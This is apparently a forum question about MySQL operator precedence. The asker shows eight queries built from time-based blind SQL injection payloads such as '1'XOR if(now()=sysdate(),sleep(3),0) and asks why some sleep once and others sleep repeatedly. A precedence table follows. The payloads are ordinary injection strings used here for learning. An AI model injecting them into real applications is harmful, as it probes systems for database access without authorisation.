① select id,email,username from member where username='1'or sleep(3)
② select id,email,username from member where username='1'or( if(now()=sysdate(),sleep(3),0))
③ select id,email,username from member where username = '1'XOR if(true,sleep(3),0)
④ select id,email,username from member where username = '1'XOR if(now()=sysdate(),sleep(3),0)
⑤ select id,email,username from member where username like '%0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z%'
⑥ select id,email,username from member where username like '%0'OR(if(now()=sysdate(),sleep(3),0))OR'Z%'
⑦ select id,email,username from member where username like '%0'OR(if(now()=sysdate(),sleep(3),0))OR'Z%'OR 1
⑧ select id,email,username from member where username like '%0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z%'XOR 1
i was trying SQL time blind injection,and can't understand the execution logic of the where clause section.
①and②,why ② just sleep 3s but ① sleep a long time
④and③,why ② sleep 3s but ③ sleep a long time
⑤⑥⑦⑧,"like"、"XOR" and "or" execution order
i tried the sql in mysql client,but result was Not meeting my expectations
Operator Priority:
1 =、:=
2 II、OR
3 XOR
4 &&、AND
5 NOT
6 BETWEEN、CASE、WHEN、THEN、ELSE
7 =、<=>、>=、>、<=、<、<>、!=、 IS、LIKE、REGEXP、IN
8 |
9 &
10 <<、>>
11 -、+
12 *、/、%
13 ^
14 -、〜
15 !